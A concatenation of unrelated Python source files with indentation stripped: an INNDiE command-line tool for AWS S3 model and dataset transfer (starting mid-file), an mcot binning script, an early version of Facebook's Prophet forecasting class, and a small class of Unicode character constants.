if ext == ".h5" or ext == ".hdf5":
impl_upload_model(os.path.abspath(elem), bucket_name, region)
else:
key = "inndie-training-results/{}/{}".format(job_id, os.path.basename(elem))
client.upload_file(elem, bucket_name, key)
print("Uploaded to: {}\n".format(key))
def create_progress_prefix(job_id):
return "inndie-training-progress/{}".format(job_id)
@click.group()
def cli():
return
region_choices = ['us-east-1', 'us-east-2', 'us-west-1', 'us-west-2', 'ca-central-1',
'eu-central-1', 'eu-west-1', 'eu-west-2', 'eu-west-3',
'eu-north-1', 'ap-east-1', 'ap-south-1', 'ap-northeast-1',
'ap-northeast-2', 'ap-northeast-3', 'ap-southeast-1',
'ap-southeast-2', 'me-south-1', 'sa-east-1']
@cli.command(name="ensure-configuration")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def ensure_configuration(region):
"""
Ensures that AWS is configured for INNDiE.
"""
impl_ensure_configuration(region)
@cli.command(name="upload-model")
@click.argument("model-path")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def upload_model(model_path, region):
"""
Uploads a model from a local file.
MODEL_PATH The path to the model to upload, ending with the name of the model.
"""
impl_upload_model(model_path, ensure_s3_bucket(region), region)
@cli.command(name="download-model")
@click.argument("model-path")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def download_model(model_path, region):
"""
Downloads a model to a local file.
MODEL_PATH The path to download the model to, ending with the name of the model.
"""
impl_download_model(model_path, ensure_s3_bucket(region), region)
@cli.command(name="download-training-script")
@click.argument("script-path")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def download_training_script(script_path, region):
"""
Downloads a training script.
SCRIPT_PATH The path to download the script to, ending with the name of the script.
"""
impl_download_training_script(script_path, ensure_s3_bucket(region), region)
@cli.command(name="upload-dataset")
@click.argument("dataset-path")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def upload_dataset(dataset_path, region):
"""
Uploads a dataset.
DATASET_PATH The path to the dataset to upload, ending with the name of the dataset.
"""
impl_upload_dataset(dataset_path, ensure_s3_bucket(region), region)
@cli.command(name="download-dataset")
@click.argument("dataset-path")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def download_dataset(dataset_path, region):
"""
Downloads a dataset.
DATASET_PATH The path to download the dataset to, ending with the name of the dataset.
"""
impl_download_dataset(dataset_path, ensure_s3_bucket(region), region)
@cli.command(name="update-training-progress")
@click.argument("job-id")
@click.argument("progress-text")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def update_training_progress(job_id, progress_text, region):
"""
Updates the training progress. Meant to be used while a training script is running to provide
progress updates to INNDiE.
JOB_ID The unique Job ID.
PROGRESS_TEXT The text to write to the progress file.
"""
impl_update_training_progress(job_id, progress_text, ensure_s3_bucket(region),
region)
@cli.command(name="create-heartbeat")
@click.argument("job-id")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def create_heartbeat(job_id, region):
"""
Creates a heartbeat that INNDiE uses to check if the training script is running properly.
JOB_ID The unique Job ID.
"""
impl_create_heartbeat(job_id, ensure_s3_bucket(region), region)
@cli.command(name="remove-heartbeat")
@click.argument("job-id")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def remove_heartbeat(job_id, region):
"""
Removes a heartbeat that INNDiE uses to check if the training script is running properly.
JOB_ID The unique Job ID.
"""
impl_remove_heartbeat(job_id, ensure_s3_bucket(region), region)
@cli.command(name="set-training-log-file")
@click.argument("job-id")
@click.argument("log-file")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def set_training_log_file(job_id, log_file, region):
"""
Sets the training log file contents to the contents of the log file.
JOB_ID The unique Job ID.
LOG_FILE The log file to read from.
"""
impl_set_training_log_file(job_id, log_file, ensure_s3_bucket(region), region)
@cli.command(name="upload-training-results")
@click.argument("job-id")
@click.argument("output-dir")
@click.option("--region", help="The region to connect to.",
type=click.Choice(region_choices))
def upload_training_results(job_id, output_dir, region):
"""
Uploads the results from running a training script.
JOB_ID The unique Job ID.
OUTPUT_DIR The directory containing the results.
"""
impl_upload_training_results(job_id, output_dir, ensure_s3_bucket(region), region)
|
<gh_stars>0
#!/usr/bin/env python
"""
Discretizes a continuous variable
"""
from loguru import logger
from mcot.core import scripts
import numpy as np
import colorcet as cc
from mcot.core.cifti import combine
def run_array(arr, nbins, bins=None, weight=None, include_zeros=False):
"""
Returns a discretised version of the input array
:param arr: nibabel input image
:param nbins: number of bins to extract
:param bins: one of the following
- None: use weight to set the bins
- 'number': each parcel will have the same number of elements
- 'regular': split the range from min to max in the input into equal bins
- 1D array: explicit boundaries
:param weight: selects the bins so each parcel has the same sum in this image (only used if bins is None)
:param include_zeros: if True include zeros in the analysis
:return: tuple with:
- array with the parcels (zero where the original array was zero)
- (nbins + 1, ...) array with the applied boundaries
"""
if weight is not None and arr.shape[:weight.ndim] != weight.shape:
raise ValueError("Shape of weight image does not match input image")
res = np.zeros(arr.shape, dtype='i4')
all_bins = np.zeros((nbins + 1, ) + (() if weight is None else arr.shape[weight.ndim:]))
for idx in np.ndindex(*(() if weight is None else arr.shape[weight.ndim:])):
sub_arr = arr[(Ellipsis, ) + idx]
mask = slice(None) if include_zeros else sub_arr != 0
if weight is not None:
if (np.array(idx) == 0).all():
logger.info('Using weight file to set bins')
idx_sorted = np.argsort(sub_arr[mask])
values = np.append(0, np.cumsum(weight[mask][idx_sorted]))
edges = np.floor(np.interp(
np.linspace(0, values[-1], nbins + 1)[1:-1],
values,
np.arange(values.size),
)).astype('int')
use_bins_mid = sub_arr[mask][idx_sorted][edges]
use_bins = np.append(-np.inf, np.append(use_bins_mid, np.inf))
elif bins == 'regular':
if (np.array(idx) == 0).all():
logger.info('Using regularly spaced bins')
use_bins = np.linspace(sub_arr.min(), sub_arr.max(), nbins + 1)
elif bins == 'number':
if (np.array(idx) == 0).all():
logger.info('Setting bins to have identical number of elements in parcels')
use_bins = np.sort(sub_arr[mask])[np.around(np.linspace(0, sub_arr[mask].size - 1, nbins + 1)).astype('i4')]
else:
use_bins = np.array(bins)
assert use_bins.size == nbins + 1
logger.debug(f'Bins for {idx}: {use_bins}')
all_bins[(Ellipsis, ) + idx] = use_bins
use_bins[-1] += 1e-8
res[(Ellipsis, ) + idx][mask] = np.digitize(sub_arr[mask], use_bins)
return res, all_bins
def run_from_args(args):
"""
Runs the script based on a Namespace containing the command line arguments
"""
arr, axes = args.input
bins, weight = None, None
if args.equal_weight:
weight, axes_weight = args.equal_weight
bm, (idx_arr, idx_weight) = combine([axes[-1], axes_weight[-1]])
axes = axes[:-1] + (bm, )
arr = arr[..., idx_arr]
weight = weight[..., idx_weight]
elif args.equal_number:
bins = 'number'
elif args.equal_bin:
bins = 'regular'
elif args.set_bin:
if len(args.set_bin) == args.nbins - 1:
args.set_bin = np.append(-np.inf, np.append(args.set_bin, np.inf))
assert len(args.set_bin) == args.nbins + 1
bins = args.set_bin
else:
raise ValueError("No binning method selected")
res, used_bins = run_array(
arr, args.nbins, bins=bins, weight=weight, include_zeros=args.include_zeros
)
labels = [{int(idx): (f'{start:.2f} to {end:.2f}', c) for idx, start, end, c in zip(
range(1, 100), used_bins[:-1], used_bins[1:], cc.glasbey)}]
new_axes = (axes[0].to_label(labels), ) + axes[1:]
args.output((res, new_axes))
def add_to_parser(parser):
"""
Creates the parser of the command line arguments
"""
parser.add_argument('input', type=scripts.greyordinate_in,
help='input NIFTI/GIFTI/CIFTI file')
parser.add_argument('output', type=scripts.output,
help='output NIFTI/GIFTI/CIFTI files')
parser.add_argument('nbins', type=int, help='number of bins')
parser.add_argument('-i0', '--include_zeros', help='Include zeros in the analysis (always true for CIFTI)')
grp = parser.add_mutually_exclusive_group()
grp.add_argument('--equal_weight', type=scripts.greyordinate_in,
help='Each bin will contain the same total weight of given file')
grp.add_argument('--equal_number', action='store_true',
help='Each bin will contain the same number of elements')
grp.add_argument('--equal_bin', action='store_true',
help='Each bin will have the same size (from min to max value)')
grp.add_argument('--set_bin', nargs='*', type=float,
help='Manually sets the edges of the bins as a sequence of numbers')
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import defaultdict
from datetime import timedelta
import pickle
from matplotlib import pyplot as plt
from matplotlib.dates import DateFormatter, MonthLocator
from matplotlib.ticker import MaxNLocator
import numpy as np
import pandas as pd
# fb-block 1 start
import pkg_resources
# fb-block 1 end
try:
import pystan
except ImportError:
print('You cannot run prophet without pystan installed')
raise
# fb-block 2
class Prophet(object):
def __init__(
self,
growth='linear',
changepoints=None,
n_changepoints=25,
yearly_seasonality=True,
weekly_seasonality=True,
holidays=None,
seasonality_prior_scale=10.0,
holidays_prior_scale=10.0,
changepoint_prior_scale=0.05,
mcmc_samples=0,
interval_width=0.80,
uncertainty_samples=1000,
):
self.growth = growth
self.changepoints = pd.to_datetime(changepoints)
if self.changepoints is not None:
self.n_changepoints = len(self.changepoints)
else:
self.n_changepoints = n_changepoints
self.yearly_seasonality = yearly_seasonality
self.weekly_seasonality = weekly_seasonality
if holidays is not None:
if not (
isinstance(holidays, pd.DataFrame)
and 'ds' in holidays
and 'holiday' in holidays
):
raise ValueError("holidays must be a DataFrame with 'ds' and "
"'holiday' columns.")
holidays['ds'] = pd.to_datetime(holidays['ds'])
self.holidays = holidays
self.seasonality_prior_scale = float(seasonality_prior_scale)
self.changepoint_prior_scale = float(changepoint_prior_scale)
self.holidays_prior_scale = float(holidays_prior_scale)
self.mcmc_samples = mcmc_samples
self.interval_width = interval_width
self.uncertainty_samples = uncertainty_samples
# Set during fitting
self.start = None
self.y_scale = None
self.t_scale = None
self.changepoints_t = None
self.stan_fit = None
self.params = {}
self.history = None
self.validate_inputs()
def validate_inputs(self):
if self.growth not in ('linear', 'logistic'):
raise ValueError(
"Parameter 'growth' should be 'linear' or 'logistic'.")
if self.holidays is not None:
has_lower = 'lower_window' in self.holidays
has_upper = 'upper_window' in self.holidays
if has_lower + has_upper == 1:
raise ValueError('Holidays must have both lower_window and ' +
'upper_window, or neither')
if has_lower:
if max(self.holidays['lower_window']) > 0:
raise ValueError('Holiday lower_window should be <= 0')
if min(self.holidays['upper_window']) < 0:
raise ValueError('Holiday upper_window should be >= 0')
for h in self.holidays['holiday'].unique():
if '_delim_' in h:
raise ValueError('Holiday name cannot contain "_delim_"')
if h in ['zeros', 'yearly', 'weekly', 'yhat', 'seasonal',
'trend']:
raise ValueError('Holiday name {} reserved.'.format(h))
@classmethod
def get_linear_model(cls):
# fb-block 3
# fb-block 4 start
model_file = pkg_resources.resource_filename(
'fbprophet',
'stan_models/linear_growth.pkl'
)
# fb-block 4 end
with open(model_file, 'rb') as f:
return pickle.load(f)
@classmethod
def get_logistic_model(cls):
# fb-block 5
# fb-block 6 start
model_file = pkg_resources.resource_filename(
'fbprophet',
'stan_models/logistic_growth.pkl'
)
# fb-block 6 end
with open(model_file, 'rb') as f:
return pickle.load(f)
def setup_dataframe(self, df, initialize_scales=False):
"""Create auxillary columns 't', 't_ix', 'y_scaled', and 'cap_scaled'.
These columns are used during both fitting and prediction.
"""
if 'y' in df:
df['y'] = pd.to_numeric(df['y'])
df['ds'] = pd.to_datetime(df['ds'])
df = df.sort_values('ds')
df.reset_index(inplace=True, drop=True)
if initialize_scales:
self.y_scale = df['y'].max()
self.start = df['ds'].min()
self.t_scale = df['ds'].max() - self.start
df['t'] = (df['ds'] - self.start) / self.t_scale
if 'y' in df:
df['y_scaled'] = df['y'] / self.y_scale
if self.growth == 'logistic':
assert 'cap' in df
df['cap_scaled'] = df['cap'] / self.y_scale
return df
def set_changepoints(self):
"""Generate a list of changepoints.
Either:
1) the changepoints were passed in explicitly
A) they are empty
B) not empty, needs validation
2) we are generating a grid of them
3) the user prefers no changepoints to be used
"""
if self.changepoints is not None:
if len(self.changepoints) == 0:
pass
else:
too_low = min(self.changepoints) < self.history['ds'].min()
too_high = max(self.changepoints) > self.history['ds'].max()
if too_low or too_high:
raise ValueError('Changepoints must fall within training data.')
elif self.n_changepoints > 0:
# Place potential changepoints evenly throuh first 80% of history
max_ix = np.floor(self.history.shape[0] * 0.8)
cp_indexes = (
np.linspace(0, max_ix, self.n_changepoints + 1)
.round()
.astype(np.int)
)
self.changepoints = self.history.ix[cp_indexes]['ds'].tail(-1)
else:
# set empty changepoints
self.changepoints = []
if len(self.changepoints) > 0:
self.changepoints_t = np.sort(np.array(
(self.changepoints - self.start) / self.t_scale))
else:
self.changepoints_t = np.array([0]) # dummy changepoint
def get_changepoint_matrix(self):
A = np.zeros((self.history.shape[0], len(self.changepoints_t)))
for i, t_i in enumerate(self.changepoints_t):
A[self.history['t'].values >= t_i, i] = 1
return A
@staticmethod
def fourier_series(dates, period, series_order):
"""Generate a Fourier expansion for a fixed frequency and order.
Parameters
----------
dates: a pd.Series containing timestamps
period: an integer frequency (number of days)
series_order: number of components to generate
Returns
-------
a 2-dimensional np.array with one row per row in `dt`
"""
# convert to days since epoch
t = np.array(
(dates - pd.datetime(1970, 1, 1))
.dt.days
.astype(np.float)
)
return np.column_stack([
fun((2.0 * (i + 1) * np.pi * t / period))
for i in range(series_order)
for fun in (np.sin, np.cos)
])
@classmethod
def make_seasonality_features(cls, dates, period, series_order, prefix):
features = cls.fourier_series(dates, period, series_order)
columns = [
'{}_delim_{}'.format(prefix, i + 1)
for i in range(features.shape[1])
]
return pd.DataFrame(features, columns=columns)
def make_holiday_features(self, dates):
"""Generate a DataFrame with each column corresponding to a holiday.
"""
# A smaller prior scale will shrink holiday estimates more
scale_ratio = self.holidays_prior_scale / self.seasonality_prior_scale
# Holds columns of our future matrix.
expanded_holidays = defaultdict(lambda: np.zeros(dates.shape[0]))
# Makes an index so we can perform `get_loc` below.
row_index = pd.DatetimeIndex(dates)
for ix, row in self.holidays.iterrows():
dt = row.ds.date()
try:
lw = int(row.get('lower_window', 0))
uw = int(row.get('upper_window', 0))
except ValueError:
lw = 0
uw = 0
for offset in range(lw, uw + 1):
occurrence = dt + timedelta(days=offset)
try:
loc = row_index.get_loc(occurrence)
except KeyError:
loc = None
key = '{}_delim_{}{}'.format(
row.holiday,
'+' if offset >= 0 else '-',
abs(offset)
)
if loc is not None:
expanded_holidays[key][loc] = scale_ratio
else:
# Access key to generate value
expanded_holidays[key]
# This relies pretty importantly on pandas keeping the columns in order.
return pd.DataFrame(expanded_holidays)
def make_all_seasonality_features(self, df):
seasonal_features = [
# Add a column of zeros in case no seasonality is used.
pd.DataFrame({'zeros': np.zeros(df.shape[0])})
]
# Seasonality features
if self.yearly_seasonality:
seasonal_features.append(self.make_seasonality_features(
df['ds'],
365.25,
10,
'yearly',
))
if self.weekly_seasonality:
seasonal_features.append(self.make_seasonality_features(
df['ds'],
7,
3,
'weekly',
))
if self.holidays is not None:
seasonal_features.append(self.make_holiday_features(df['ds']))
return pd.concat(seasonal_features, axis=1)
@staticmethod
def linear_growth_init(df):
i0, i1 = df['ds'].idxmin(), df['ds'].idxmax()
T = df['t'].ix[i1] - df['t'].ix[i0]
k = (df['y_scaled'].ix[i1] - df['y_scaled'].ix[i0]) / T
m = df['y_scaled'].ix[i0] - k * df['t'].ix[i0]
return (k, m)
@staticmethod
def logistic_growth_init(df):
i0, i1 = df['ds'].idxmin(), df['ds'].idxmax()
T = df['t'].ix[i1] - df['t'].ix[i0]
# Force valid values, in case y > cap.
r0 = max(1.01, df['cap_scaled'].ix[i0] / df['y_scaled'].ix[i0])
r1 = max(1.01, df['cap_scaled'].ix[i1] / df['y_scaled'].ix[i1])
if abs(r0 - r1) <= 0.01:
r0 = 1.05 * r0
L0 = np.log(r0 - 1)
L1 = np.log(r1 - 1)
# Initialize the offset
m = L0 * T / (L0 - L1)
# And the rate
k = L0 / m
return (k, m)
# fb-block 7
def fit(self, df, **kwargs):
"""Fit the Prophet model to data.
Parameters
----------
df: pd.DataFrame containing history. Must have columns 'ds', 'y', and
if logistic growth, 'cap'.
kwargs: Additional arguments passed to Stan's sampling or optimizing
function, as appropriate.
Returns
-------
The fitted Prophet object.
"""
history = df[df['y'].notnull()].copy()
history = self.setup_dataframe(history, initialize_scales=True)
self.history = history
seasonal_features = self.make_all_seasonality_features(history)
self.set_changepoints()
A = self.get_changepoint_matrix()
dat = {
'T': history.shape[0],
'K': seasonal_features.shape[1],
'S': len(self.changepoints_t),
'y': history['y_scaled'],
't': history['t'],
'A': A,
't_change': self.changepoints_t,
'X': seasonal_features,
'sigma': self.seasonality_prior_scale,
'tau': self.changepoint_prior_scale,
}
if self.growth == 'linear':
kinit = self.linear_growth_init(history)
model = self.get_linear_model()
else:
dat['cap'] = history['cap_scaled']
kinit = self.logistic_growth_init(history)
model = self.get_logistic_model()
def stan_init():
return {
'k': kinit[0],
'm': kinit[1],
'delta': np.zeros(len(self.changepoints_t)),
'beta': np.zeros(seasonal_features.shape[1]),
'sigma_obs': 1,
}
if self.mcmc_samples > 0:
stan_fit = model.sampling(
dat,
init=stan_init,
iter=self.mcmc_samples,
**kwargs
)
for par in stan_fit.model_pars:
self.params[par] = stan_fit[par]
else:
params = model.optimizing(dat, init=stan_init, iter=1e4, **kwargs)
for par in params:
self.params[par] = params[par].reshape((1, -1))
# If no changepoints were requested, replace delta with 0s
if len(self.changepoints) == 0:
# Fold delta into the base rate k
params['k'] = params['k'] + params['delta']
params['delta'] = np.zeros(params['delta'].shape)
return self
# fb-block 8
def predict(self, df=None):
"""Predict historical and future values for y.
Note: you must only pass in future dates here.
Historical dates are prepended before predictions are made.
`df` can be None, in which case we predict only on history.
"""
if df is None:
df = self.history.copy()
else:
df = self.setup_dataframe(df)
df['trend'] = self.predict_trend(df)
seasonal_components = self.predict_seasonal_components(df)
intervals = self.predict_uncertainty(df)
df2 = pd.concat((df, intervals, seasonal_components), axis=1)
df2['yhat'] = df2['trend'] + df2['seasonal']
return df2
@staticmethod
def piecewise_linear(t, deltas, k, m, changepoint_ts):
# Intercept changes
gammas = -changepoint_ts * deltas
# Get cumulative slope and intercept at each t
k_t = k * np.ones_like(t)
m_t = m * np.ones_like(t)
for s, t_s in enumerate(changepoint_ts):
indx = t >= t_s
k_t[indx] += deltas[s]
m_t[indx] += gammas[s]
return k_t * t + m_t
@staticmethod
def piecewise_logistic(t, cap, deltas, k, m, changepoint_ts):
# Compute offset changes
k_cum = np.concatenate((np.atleast_1d(k), np.cumsum(deltas) + k))
gammas = np.zeros(len(changepoint_ts))
for i, t_s in enumerate(changepoint_ts):
gammas[i] = (
(t_s - m - np.sum(gammas))
* (1 - k_cum[i] / k_cum[i + 1])
)
# Get cumulative rate and offset at each t
k_t = k * np.ones_like(t)
m_t = m * np.ones_like(t)
for s, t_s in enumerate(changepoint_ts):
indx = t >= t_s
k_t[indx] += deltas[s]
m_t[indx] += gammas[s]
return cap / (1 + np.exp(-k_t * (t - m_t)))
def predict_trend(self, df):
k = np.nanmean(self.params['k'])
m = np.nanmean(self.params['m'])
deltas = np.nanmean(self.params['delta'], axis=0)
t = np.array(df['t'])
if self.growth == 'linear':
trend = self.piecewise_linear(t, deltas, k, m, self.changepoints_t)
else:
cap = df['cap_scaled']
trend = self.piecewise_logistic(
t, cap, deltas, k, m, self.changepoints_t)
return trend * self.y_scale
def predict_seasonal_components(self, df):
seasonal_features = self.make_all_seasonality_features(df)
lower_p = 100 * (1.0 - self.interval_width) / 2
upper_p = 100 * (1.0 + self.interval_width) / 2
components = pd.DataFrame({
'col': np.arange(seasonal_features.shape[1]),
'component': [x.split('_delim_')[0] for x in seasonal_features.columns],
})
# Remove the placeholder
components = components[components['component'] != 'zeros']
if components.shape[0] > 0:
X = seasonal_features.as_matrix()
data = {}
for component, features in components.groupby('component'):
cols = features.col.tolist()
comp_beta = self.params['beta'][:, cols]
comp_features = X[:, cols]
comp = (
np.matmul(comp_features, comp_beta.transpose())
* self.y_scale
)
data[component] = np.nanmean(comp, axis=1)
data[component + '_lower'] = np.nanpercentile(comp, lower_p,
axis=1)
data[component + '_upper'] = np.nanpercentile(comp, upper_p,
axis=1)
component_predictions = pd.DataFrame(data)
component_predictions['seasonal'] = (
component_predictions[components['component'].unique()].sum(1))
else:
component_predictions = pd.DataFrame(
{'seasonal': np.zeros(df.shape[0])})
return component_predictions
def predict_uncertainty(self, df):
n_iterations = self.params['k'].shape[0]
samp_per_iter = max(1, int(np.ceil(
self.uncertainty_samples / float(n_iterations)
)))
# Generate seasonality features once so we can re-use them.
seasonal_features = self.make_all_seasonality_features(df)
sim_values = {'yhat': [], 'trend': [], 'seasonal': []}
for i in range(n_iterations):
for j in range(samp_per_iter):
sim = self.sample_model(df, seasonal_features, i)
for key in sim_values:
sim_values[key].append(sim[key])
lower_p = 100 * (1.0 - self.interval_width) / 2
upper_p = 100 * (1.0 + self.interval_width) / 2
series = {}
for key, value in sim_values.items():
mat = np.column_stack(value)
series['{}_lower'.format(key)] = np.nanpercentile(mat, lower_p,
axis=1)
series['{}_upper'.format(key)] = np.nanpercentile(mat, upper_p,
axis=1)
return pd.DataFrame(series)
def sample_model(self, df, seasonal_features, iteration):
trend = self.sample_predictive_trend(df, iteration)
beta = self.params['beta'][iteration]
seasonal = np.matmul(seasonal_features.as_matrix(), beta) * self.y_scale
sigma = self.params['sigma_obs'][iteration]
noise = np.random.normal(0, sigma, df.shape[0]) * self.y_scale
return pd.DataFrame({
'yhat': trend + seasonal + noise,
'trend': trend,
'seasonal': seasonal,
})
def sample_predictive_trend(self, df, iteration):
k = self.params['k'][iteration]
m = self.params['m'][iteration]
deltas = self.params['delta'][iteration]
t = np.array(df['t'])
T = t.max()
if T > 1:
# Get the time discretization of the history
dt = np.diff(self.history['t'])
dt = np.min(dt[dt > 0])
# Number of time periods in the future
N = np.ceil((T - 1) / float(dt))
S = len(self.changepoints_t)
prob_change = min(1, (S * (T - 1)) / N)
n_changes = np.random.binomial(N, prob_change)
# Sample ts
changepoint_ts_new = sorted(np.random.uniform(1, T, n_changes))
else:
# Case where we're not extrapolating.
changepoint_ts_new = []
n_changes = 0
# Get the empirical scale of the deltas, plus epsilon to avoid NaNs.
lambda_ = np.mean(np.abs(deltas)) + 1e-8
# Sample deltas
deltas_new = np.random.laplace(0, lambda_, n_changes)
# Prepend the times and deltas from the history
changepoint_ts = np.concatenate((self.changepoints_t,
changepoint_ts_new))
deltas = np.concatenate((deltas, deltas_new))
if self.growth == 'linear':
trend = self.piecewise_linear(t, deltas, k, m, changepoint_ts)
else:
cap = df['cap_scaled']
trend = self.piecewise_logistic(t, cap, deltas, k, m,
changepoint_ts)
return trend * self.y_scale
def make_future_dataframe(self, periods, freq='D', include_history=True):
last_date = self.history['ds'].max()
dates = pd.date_range(
start=last_date,
periods=periods + 1, # An extra in case we include start
freq=freq)
dates = dates[dates > last_date] # Drop start if equals last_date
dates = dates[:periods] # Return correct number of periods
if include_history:
dates = np.concatenate((np.array(self.history['ds']), dates))
return pd.DataFrame({'ds': dates})
def plot(self, fcst, uncertainty=True, xlabel='ds', ylabel='y'):
"""Plot the Prophet forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
uncertainty: Optional boolean to plot uncertainty intervals.
xlabel: Optional label name on X-axis
ylabel: Optional label name on Y-axis
Returns
-------
a matplotlib figure.
"""
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
ax.plot(self.history['ds'].values, self.history['y'], 'k.')
ax.plot(fcst['ds'].values, fcst['yhat'], ls='-', c='#0072B2')
if 'cap' in fcst:
ax.plot(fcst['ds'].values, fcst['cap'], ls='--', c='k')
if uncertainty:
ax.fill_between(fcst['ds'].values, fcst['yhat_lower'],
fcst['yhat_upper'], color='#0072B2',
alpha=0.2)
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
fig.tight_layout()
return fig
def plot_components(self, fcst, uncertainty=True):
"""Plot the Prophet forecast components.
Will plot whichever are available of: trend, holidays, weekly
seasonality, and yearly seasonality.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a matplotlib figure.
"""
# Identify components to be plotted
components = [('plot_trend', True),
('plot_holidays', self.holidays is not None),
('plot_weekly', 'weekly' in fcst),
('plot_yearly', 'yearly' in fcst)]
components = [(plot, cond) for plot, cond in components if cond]
npanel = len(components)
fig, axes = plt.subplots(npanel, 1, facecolor='w',
figsize=(9, 3 * npanel))
artists = []
for ax, plot in zip(axes,
[getattr(self, plot) for plot, _ in components]):
artists += plot(fcst, ax=ax, uncertainty=uncertainty)
fig.tight_layout()
return artists
def plot_trend(self, fcst, ax=None, uncertainty=True):
"""Plot the trend component of the forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
ax: Optional matplotlib Axes to plot on.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a list of matplotlib artists
"""
artists = []
if not ax:
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
artists += ax.plot(fcst['ds'].values, fcst['trend'], ls='-',
c='#0072B2')
if 'cap' in fcst:
artists += ax.plot(fcst['ds'].values, fcst['cap'], ls='--', c='k')
if uncertainty:
artists += [ax.fill_between(
fcst['ds'].values, fcst['trend_lower'], fcst['trend_upper'],
color='#0072B2', alpha=0.2)]
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
ax.xaxis.set_major_locator(MaxNLocator(nbins=7))
ax.set_xlabel('ds')
ax.set_ylabel('trend')
return artists
def plot_holidays(self, fcst, ax=None, uncertainty=True):
"""Plot the holidays component of the forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
ax: Optional matplotlib Axes to plot on. One will be created if this
is not provided.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a list of matplotlib artists
"""
artists = []
if not ax:
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
holiday_comps = self.holidays['holiday'].unique()
y_holiday = fcst[holiday_comps].sum(1)
y_holiday_l = fcst[[h + '_lower' for h in holiday_comps]].sum(1)
y_holiday_u = fcst[[h + '_upper' for h in holiday_comps]].sum(1)
# NOTE the above CI calculation is incorrect if holidays overlap
# in time. Since it is just for the visualization we will not
# worry about it now.
artists += ax.plot(fcst['ds'].values, y_holiday, ls='-',
c='#0072B2')
if uncertainty:
artists += [ax.fill_between(fcst['ds'].values,
y_holiday_l, y_holiday_u,
color='#0072B2', alpha=0.2)]
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
ax.xaxis.set_major_locator(MaxNLocator(nbins=7))
ax.set_xlabel('ds')
ax.set_ylabel('holidays')
return artists
def plot_weekly(self, fcst, ax=None, uncertainty=True):
"""Plot the weekly component of the forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
ax: Optional matplotlib Axes to plot on. One will be created if this
is not provided.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a list of matplotlib artists
"""
artists = []
if not ax:
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
df_s = fcst.copy()
df_s['dow'] = df_s['ds'].dt.weekday_name
df_s = df_s.groupby('dow').first()
days = pd.date_range(start='2017-01-01', periods=7).weekday_name
y_weekly = [df_s.loc[d]['weekly'] for d in days]
y_weekly_l = [df_s.loc[d]['weekly_lower'] for d in days]
y_weekly_u = [df_s.loc[d]['weekly_upper'] for d in days]
artists += ax.plot(range(len(days)), y_weekly, ls='-',
c='#0072B2')
if uncertainty:
artists += [ax.fill_between(range(len(days)),
y_weekly_l, y_weekly_u,
color='#0072B2', alpha=0.2)]
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
ax.set_xticks(range(len(days)))
ax.set_xticklabels(days)
ax.set_xlabel('Day of week')
ax.set_ylabel('weekly')
return artists
def plot_yearly(self, fcst, ax=None, uncertainty=True):
"""Plot the yearly component of the forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
ax: Optional matplotlib Axes to plot on. One will be created if
this is not provided.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a list of matplotlib artists
"""
artists = []
if not ax:
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
df_s = fcst.copy()
df_s['doy'] = df_s['ds'].map(lambda x: x.strftime('2000-%m-%d'))
df_s = df_s.groupby('doy').first().sort_index()
artists += ax.plot(pd.to_datetime(df_s.index), df_s['yearly'], ls='-',
c='#0072B2')
if uncertainty:
artists += [ax.fill_between(
pd.to_datetime(df_s.index), df_s['yearly_lower'],
df_s['yearly_upper'], color='#0072B2', alpha=0.2)]
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
months = MonthLocator(range(1, 13), bymonthday=1, interval=2)
ax.xaxis.set_major_formatter(DateFormatter('%B %-d'))
ax.xaxis.set_major_locator(months)
ax.set_xlabel('Day of year')
ax.set_ylabel('yearly')
return artists
# fb-block 9
|
class Chars:
"""Unicode symbols that are useful in code and annoying to search for repeatedly."""
# punctuation
nbsp = u'\u00A0' # non-breaking space
zwidthspace = u'\u200B' # zero-width space
thinspace = u'\u2009'
hairspace = u'\u200A'
emspace = u'\u2003'
hyphen = '‐' # proper unicode hyphen
nbhyphen = '‑' # non-breaking hyphen
fig = '‒' # figure dash, ex in phone numbers
en = '–' # en dash, ex in ranges
em = '—' # em dash, like a semicolon
ellipsis = '…' # only 1 character, which is helpful
middots = '⋯'
middot = '·'
rsq, lsq, rdq, ldq = '’', '‘', '”', '“'
# math
ell = 'ℓ'
micro, degree, angstrom = 'µ', '°', 'Å'
